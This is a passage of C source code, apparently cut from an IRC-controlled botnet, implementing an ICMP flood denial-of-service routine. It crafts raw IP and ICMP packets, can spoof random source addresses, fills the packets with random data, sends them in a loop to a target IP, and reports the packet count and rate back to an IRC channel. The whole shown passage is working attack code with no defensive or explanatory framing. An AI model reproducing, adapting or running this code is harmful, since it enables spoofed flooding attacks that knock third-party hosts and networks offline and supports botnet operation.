echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); echo_req.ipHeader.ident=1; echo_req.ipHeader.frag_and_flags=0; echo_req.ipHeader.ttl=128; echo_req.ipHeader.proto=IPPROTO_ICMP; echo_req.ipHeader.checksum=0; echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock)))); echo_req.ipHeader.destIP=ssin.sin_addr.s_addr; echo_req.icmpHeader.type = rand()%256; echo_req.icmpHeader.subcode = rand()%256; echo_req.icmpHeader.id = (rand() % 240) + 1; echo_req.icmpHeader.checksum = 0; echo_req.icmpHeader.seq = 1; //fill the packet data with a random character.. memset(echo_req.cData, rand()%255, sizeof(echo_req.cData)); if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); }